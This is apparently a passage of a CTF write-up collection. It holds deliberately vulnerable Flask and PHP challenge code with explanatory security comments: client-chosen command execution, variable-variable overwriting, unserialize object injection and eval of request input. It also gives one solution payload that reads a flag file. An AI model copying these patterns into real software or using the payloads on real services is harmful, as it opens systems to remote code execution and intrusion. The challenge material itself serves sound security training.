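from flask import request

# Both values come straight from the HTTP form body and are untrusted.
# `request.form.get` returns None when a field is absent (hence the
# `is not None` guard below), so the `str` annotations are optimistic.
cmd: str = request.form.get('cmd')
param: str = request.form.get('param')
# ------------------------------------- Don't modify ↑ them ↑! But you can write your code ↓
import os
import subprocess

if cmd is not None and param is not None:
    # SECURITY: the program to run is the first three characters of a
    # request field; it is truncated, never validated. Passing a list (not
    # a shell string) avoids shell injection, but it does not limit *which*
    # executable is launched, so the client effectively picks the program
    # and its first argument. A real service must resolve `cmd` against a
    # fixed allowlist of permitted commands before calling subprocess.
    try:
        # The result object was previously bound to an unused local.
        subprocess.run([cmd[:3], param, __file__], cwd=os.getcwd(), timeout=5)
        print('Done!')
    except subprocess.TimeoutExpired:
        print('Timeout!')
    # `except Exception` rather than a bare `except:` so KeyboardInterrupt
    # and SystemExit still propagate; OSError subclasses such as
    # FileNotFoundError (unknown program) and PermissionError land here.
    except Exception:
        print('Error!')
else:
    print('No Flag!')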
发现代码接收两个参数 cmd 和 param:截取 cmd 的前三个字符作为要执行的命令,param 作为该命令的参数。
所以直接构造cat flag.txt
payload:
cmd=cat&param=flag.txt
ctfshow{7d9cfcf5-9314-4eb0-9240-d77a6ca6f29d}
遍地飘零
考点:$$ 变量覆盖,$_GET 全局变量和本地变量
<?php include "flag.php"; highlight_file(__FILE__);
// flag.php is expected to define $flag; highlight_file() prints this file's
// own source into the response, so the logic below is always visible.
$zeros="000000000000000000000000000000";
// SECURITY: "variable variables" driven entirely by request input. For each
// query parameter, the variable NAMED by the key receives the value of the
// variable NAMED by the value, so a client can overwrite or alias any
// variable in this scope (including $flag from flag.php) and thereby steer
// the comparison below. Never derive variable names from user input; read
// the specific keys you expect explicitly.
foreach($_GET as $key => $value){ $$key=$$value; }
// Loose (==) comparison against the same literal as $zeros; which branch
// runs depends only on what $flag holds after the loop above. The else
// branch dumps the raw query array back to the client.
if ($flag=="000000000000000000000000000000"){ echo "好多零"; }else{ echo "没有零,仔细看看输入有什么问题吧"; var_dump($_GET); }
<?php include "flag.php"; highlight_file(__FILE__);
// flag.php is expected to define $flag (read later via `global $flag`);
// highlight_file() prints this file's own source into the response.
/**
 * Moon: a small data holder with a side-effecting __wakeup hook.
 *
 * __toString() returns $name. __wakeup() — run by PHP when an instance of
 * this class is produced by unserialize() — echoes a greeting built from
 * $name. Because this file unserializes request data (see the bottom of
 * the file), an instance with an attacker-chosen $name can be created and
 * this hook fires without any explicit call from application code.
 */
class Moon{ public $name="月亮"; public function __toString(){ return $this->name; } public function __wakeup(){ echo "我是".$this->name."快来赏我"; } }
/**
 * Ion_Fan_Princess: gates disclosure of the global $flag on $nickname.
 *
 * call() echoes $flag only when $nickname equals "小甜甜"; otherwise it
 * echoes two fixed lines that embed $nickname without escaping. __toString()
 * calls call() and returns tabs plus "----" plus $nickname, so the gate is
 * evaluated implicitly whenever an instance is used as a string.
 *
 * SECURITY: an instance built by unserialize() from request data carries an
 * attacker-chosen $nickname, so this class is a direct path to $flag and to
 * reflected, unescaped output. Do not unserialize request input; accept a
 * structured format (json_decode with a fixed schema) instead.
 */
class Ion_Fan_Princess{ public $nickname="牛夫人";
// call(): the only reader of $flag in this file; the failure branch reflects
// $nickname back to the client verbatim.
public function call(){ global $flag; if ($this->nickname=="小甜甜"){ echo $flag; }else{ echo "以前陪我看月亮的时候,叫人家小甜甜!现在新人胜旧人,叫人家".$this->nickname."。\n"; echo "你以为我这么辛苦来这里真的是为了这条臭牛吗?是为了你这个没良心的臭猴子啊!\n"; } } public function __toString(){ $this->call(); return "\t\t\t\t\t\t\t\t\t\t----".$this->nickname; } }
// SECURITY: unserialize() on raw request input can instantiate any class
// defined above (Moon, Ion_Fan_Princess) with attacker-chosen properties and
// triggers their magic methods (__wakeup on load, __toString on any later
// string use). Treat this as object injection: accept a structured format
// such as JSON instead, or at minimum pass ['allowed_classes' => false] as
// the second argument. (The closing brace of this if block is missing from
// this listing.)
if (isset($_GET['code'])){ unserialize($_GET['code']);
<?php
header("Content-Type:text/html;charset=utf-8");
include 'lib.php';
// Creates the plugin directory world-writable (0777) and hides any failure
// with @; a world-writable directory under the web root is itself a risk,
// so the mode should be tightened and errors logged rather than suppressed.
if(!is_dir('./plugins/')){ @mkdir('./plugins/', 0777); }
//Test it and delete it !!!
// Test execution of the encrypted (encoded) plugin code.
// SECURITY: eval() of request-controlled data. decode() comes from lib.php
// (not shown here) — presumably a reversible transform, TODO confirm — so a
// client that can produce its expected input gets arbitrary PHP execution;
// the @ also hides parse errors. This debug endpoint should be removed
// entirely, not left behind the `action=test` check. $_GET['action'] is also
// read without isset(), which emits an undefined-index notice/warning when
// the key is absent.
if($_GET['action'] === 'test') { echo 'Anything is good?Please test it.'; @eval(decode($_GET['input'])); }